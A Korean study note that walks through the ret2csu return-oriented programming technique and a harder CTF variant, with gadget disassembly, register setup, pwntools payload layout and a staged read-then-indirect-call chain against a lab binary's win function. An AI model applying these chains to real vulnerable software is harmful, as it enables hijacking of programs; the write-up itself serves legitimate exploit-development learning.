# Day56 - ret2csu 개념 정리 및 Hard 변형 풀이

## 1. ret2csu 개념

`ret2csu`는 x86-64 ELF 바이너리에 존재하는 `__libc_csu_init` 내부 gadget을 이용해 함수 인자를 세팅하고 함수를 호출하는 ROP 기법이다.

일반적인 ROP에서는 `pop rdi; ret`, `pop rsi; ret`, `pop rdx; ret` 같은 gadget을 이용해 인자를 세팅한다. 하지만 바이너리 안에 `pop rdx; ret` 같은 gadget이 없을 수 있다. 이때 `__libc_csu_init` 안의 gadget을 이용하면 `rdi`, `rsi`, `rdx`를 어느 정도 제어할 수 있다.

핵심 gadget은 두 개다.

```asm
pop rbx
pop rbp
pop r12
pop r13
pop r14
pop r15
ret
```

이 gadget으로 필요한 레지스터들을 스택에서 채운다.

그 다음 call gadget은 보통 다음과 같은 형태다.

```asm
mov rdx, r15
mov rsi, r14
mov edi, r13d
call qword ptr [r12 + rbx*8]

add rbx, 1
cmp rbp, rbx
jne ...
add rsp, 8
pop rbx
pop rbp
pop r12
pop r13
pop r14
pop r15
ret
```

여기서 중요한 매핑은 다음과 같다.

```text
r15 → rdx
r14 → rsi
r13d → edi
[r12 + rbx*8] → 호출할 함수 포인터
```

즉 `r15`, `r14`, `r13`에 값을 넣은 뒤 call gadget으로 진입하면 함수 호출 직전에 `rdx`, `rsi`, `rdi`가 세팅된다.

## 2. rbx와 rbp를 0, 1로 세팅하는 이유

`__libc_csu_init`의 원래 역할은 초기화 함수 배열을 순회하면서 호출하는 것이다. 내부 구조는 대략 다음과 같은 루프와 비슷하다.

```c
for (rbx = 0; rbx < rbp; rbx++) {
    function_array[rbx](arg1, arg2, arg3);
}
```

어셈블리에서는 다음과 같이 동작한다.

```asm
call qword ptr [r12 + rbx*8]
add rbx, 1
cmp rbp, rbx
jne loop
```

따라서 `rbx = 0`, `rbp = 1`로 설정하면 첫 번째 함수 포인터만 한 번 호출한 뒤 루프를 빠져나온다.

```text
처음: rbx = 0, rbp = 1
call [r12 + 0*8]
add rbx, 1 → rbx = 1
cmp rbp, rbx → 1 == 1
루프 종료
```

## 3. `call [r12 + rbx*8]`의 의미

`call [r12 + rbx*8]`는 `r12` 자체로 점프하는 것이 아니다.

```text
r12 + rbx*8 주소로 이동
→ 그 메모리 위치의 8바이트 값을 읽음
→ 그 값을 함수 주소로 해석
→ call
```

예를 들어 다음과 같은 상태라고 하자.

```text
r12 = read@got
rbx = 0
```

그러면 실행되는 것은 다음과 같다.

```asm
call [read@got]
```

`read@got` 안에는 실제 `read` 함수 주소가 들어 있으므로 결과적으로 `read()`가 호출된다.

따라서 ret2csu에서 `r12`에는 함수 주소 자체가 아니라, 함수 주소가 저장되어 있는 메모리 주소를 넣어야 한다.

잘못된 예:

```text
r12 = win
call [r12]
→ win 주소 위치의 기계어 바이트를 함수 포인터로 해석하려고 하므로 터질 수 있음
```

올바른 예:

```text
r12 = bss
[bss] = win
call [bss]
→ win 호출
```

## 4. `r13d → edi` 문제

call gadget에는 보통 다음 명령이 있다.

```asm
mov edi, r13d
```

이 명령은 `r13` 전체 64비트를 `rdi`로 옮기는 것이 아니라, `r13`의 하위 32비트만 `edi`로 옮긴다.

x86-64에서 `edi`에 값을 쓰면 `rdi`의 상위 32비트는 0으로 클리어된다. 따라서 첫 번째 인자로 완전한 64비트 값이 필요한 경우, csu gadget만으로는 `rdi`를 정확히 세팅할 수 없다.

예를 들어 다음 값을 넣고 싶다고 하자.

```text
rdi = 0xdeadbeefdeadbeef
```

csu gadget에서 다음처럼 세팅하면:

```text
r13 = 0xdeadbeefdeadbeef
mov edi, r13d
```

실제 결과는 다음과 같다.

```text
rdi = 0x00000000deadbeef
```

따라서 ROP Emporium `ret2csu` 기본 문제에서는 `rdx`만 csu로 세팅하고, `rdi`와 `rsi`는 일반 gadget으로 세팅하는 전략을 사용했다.

```text
csu gadget → rdx 세팅
pop rdi; ret → rdi 세팅
pop rsi; pop r15; ret → rsi 세팅
ret2win@plt 호출
```

## 5. csu cleanup dummy가 필요한 이유

csu call gadget은 함수 호출 후 다음 epilogue로 떨어진다.

```asm
add rsp, 8
pop rbx
pop rbp
pop r12
pop r13
pop r14
pop r15
ret
```

따라서 `csu_call` 뒤에는 반드시 스택 소비를 맞추기 위한 dummy qword들이 필요하다.

```text
1 qword: add rsp, 8 때문에 버려짐
6 qword: pop rbx, rbp, r12, r13, r14, r15가 소비
그 다음 qword: ret이 이동할 다음 주소
```

payload에서는 다음과 같은 구조가 필요하다.

```python
payload += p64(0)  # add rsp, 8 dummy
payload += p64(0)  # rbx
payload += p64(0)  # rbp
payload += p64(0)  # r12
payload += p64(0)  # r13
payload += p64(0)  # r14
payload += p64(0)  # r15
```

여기서 값은 반드시 0일 필요는 없다. 중요한 것은 값이 아니라 개수다. 다만 이후에 해당 레지스터들을 사용하지 않기 때문에 보통 0으로 채운다.

## 6. frame_dummy와 init_array

기본 ret2csu 문제에서는 csu gadget으로 `rdx`만 세팅하고 싶었다. 하지만 csu call gadget은 `rdx`를 세팅한 뒤 반드시 다음 명령을 실행한다.

```asm
call [r12 + rbx*8]
```

즉 `rdx`만 세팅하고 끝낼 수 없고, 강제로 함수 하나를 호출해야 한다.

이때 안전하게 호출하고 돌아올 수 있는 함수 포인터가 필요하다. 보통 `.init_array`에는 `frame_dummy` 같은 초기화 함수 주소가 들어 있다.

예:

```text
.init_array 주소 = 0x600df0
[0x600df0] = 0x400600
0x400600 = frame_dummy
```

따라서 다음처럼 세팅하면:

```text
r12 = 0x600df0
rbx = 0
```

실제 호출은 다음과 같이 된다.

```text
call [0x600df0]
→ frame_dummy 호출
```

`frame_dummy`는 짧게 실행되고 정상적으로 돌아오는 함수이므로 csu call gadget을 안전하게 통과하기 위한 발판으로 사용할 수 있다.

중요한 점은 `r12 = frame_dummy`가 아니라 `r12 = init_array`여야 한다는 점이다.

```text
r12 = 0x400600      ❌ call [0x400600]이 되어 코드 바이트를 함수 포인터처럼 읽음
r12 = 0x600df0      ✅ call [0x600df0] → frame_dummy 호출
```

## 7. Hard 변형 문제 풀이 개념

Hard 변형에서는 기본 ret2csu처럼 바로 win을 호출하는 것이 아니라, writable 영역에 win 주소를 먼저 써놓고, 이후 `call [bss]` 형태로 win을 호출했다.

핵심 아이디어는 다음과 같다.

```text
1단계:
read(0, bss, 8)
→ bss에 win 주소를 씀

결과:
[bss] = win

2단계:
r12 = bss
rbx = 0
call [r12 + rbx*8]
→ call [bss]
→ win 호출
```

즉 `.bss`는 실행 코드가 있는 곳이 아니라, 함수 포인터를 저장해두는 writable slot으로 사용된다.

## 8. 1차 csu: read(0, bss, 8)

1차 csu 호출은 `read()`를 이용해 `.bss`에 win 주소를 쓰기 위한 단계다.

레지스터 세팅은 다음과 같다.

```text
rbx = 0
rbp = 1
r12 = read@got
r13 = 0
r14 = bss
r15 = 8
```

call gadget에서 다음과 같이 변환된다.

```asm
mov rdx, r15      ; rdx = 8
mov rsi, r14      ; rsi = bss
mov edi, r13d     ; rdi = 0
call [r12 + rbx*8]
```

결과적으로 다음 함수 호출이 만들어진다.

```c
read(0, bss, 8);
```

이후 pwntools에서 추가 입력으로 다음 값을 보낸다.

```python
p.send(p64(win))
```

그러면 `.bss`에는 win 주소가 저장된다.

```text
[bss] = win
```

여기서 `sendline(p64(win))`보다 `send(p64(win))`이 더 적절하다. `read(0, bss, 8)`은 정확히 8바이트만 읽으면 되기 때문에 불필요한 newline을 붙이지 않는 것이 안정적이다.

## 9. 2차 csu: call [bss]

2차 csu 호출은 `.bss`에 저장해둔 win 주소를 indirect call로 호출하는 단계다.

레지스터 세팅은 다음과 같다.

```text
rbx = 0
rbp = 1
r12 = bss
r13 = arg1
r14 = arg2
r15 = arg3
```

call gadget에서 다음처럼 변환된다.

```asm
mov rdx, r15
mov rsi, r14
mov edi, r13d
call [r12 + rbx*8]
```

즉:

```text
rdx = arg3
rsi = arg2
rdi = arg1
call [bss]
```

그리고 1차 read로 이미 다음 상태를 만들어두었기 때문에:

```text
[bss] = win
```

실제 호출은 다음과 같다.

```c
win(arg1, arg2, arg3);
```

## 10. main으로 돌아올 필요가 없는 이유

이 문제에서는 1차 payload 후 main으로 돌아갈 필요가 없다.

payload 안에 1차 csu와 2차 csu를 연속으로 배치하면 된다.

흐름은 다음과 같다.

```text
BOF payload 실행
→ csu 1번으로 read(0, bss, 8) 호출
→ 프로그램이 추가 입력 8바이트를 기다림
→ 공격자가 p64(win)을 보냄
→ read가 끝남
→ ROP chain이 계속 진행됨
→ csu 2번으로 call [bss] 실행
→ win(arg1, arg2, arg3)
```

main으로 돌아가는 방식은 leak 이후 주소 계산이 필요하거나, 첫 번째 입력 크기가 부족하거나, 프로그램 구조상 새 입력을 받아야 할 때 사용한다. 이번 문제는 no PIE이고 leak이 필요 없으며, 하나의 ROP chain 안에서 staged read와 최종 call을 모두 수행할 수 있으므로 main 복귀가 필요 없다.

## 11. 최종 exploit 구조

최종 exploit의 구조는 다음과 같다.

```text
padding

# csu 1: read(0, bss, 8)
csu_pop
rbx = 0
rbp = 1
r12 = read@got
r13 = 0
r14 = bss
r15 = 8
csu_call
cleanup dummy 7개

# csu 2: call [bss] with args
csu_pop
rbx = 0
rbp = 1
r12 = bss
r13 = arg1
r14 = arg2
r15 = arg3
csu_call
cleanup dummy 7개
```

pwntools 흐름은 다음과 같다.

```python
p.send(payload)
p.send(p64(win))
p.interactive()
```

첫 번째 `send(payload)`는 전체 ROP chain을 넣는다.
두 번째 `send(p64(win))`은 ROP chain 중간의 `read(0, bss, 8)`이 기다릴 때 `.bss`에 win 주소를 쓰기 위한 입력이다.

## 12. 이번 실습에서 배운 점

이번 실습에서 가장 중요한 점은 `call [r12 + rbx*8]`의 의미를 정확히 이해하는 것이었다.

```text
r12 자체를 호출하는 것이 아니라,
r12가 가리키는 메모리 안의 8바이트 값을 함수 주소로 읽어서 호출한다.
```

따라서 `r12 = win`은 잘못된 접근이고, `r12 = bss`, `[bss] = win` 형태로 만들어야 한다.

또한 csu gadget은 단순히 인자를 세팅하는 gadget이 아니라, 내부 루프와 cleanup epilogue까지 포함한 코드 조각이다. 따라서 `rbx = 0`, `rbp = 1`로 루프를 1회만 돌게 만들고, `csu_call` 이후 `add rsp, 8`과 6개의 pop을 처리하기 위한 dummy qword들을 정확히 배치해야 한다.

최종적으로 hard 변형에서는 다음 흐름으로 exploit에 성공했다.

```text
1. BOF로 RIP 장악
2. ret2csu로 read(0, bss, 8) 호출
3. 추가 입력으로 bss에 win 주소 저장
4. ret2csu로 call [bss] 수행
5. win(arg1, arg2, arg3) 호출 성공
```

이번 문제는 기본 ret2csu보다 더 어렵다. 단순히 csu gadget으로 레지스터를 맞추는 수준을 넘어서, writable 메모리를 함수 포인터 슬롯으로 사용하고, staged read와 indirect call을 연결해야 했기 때문이다.
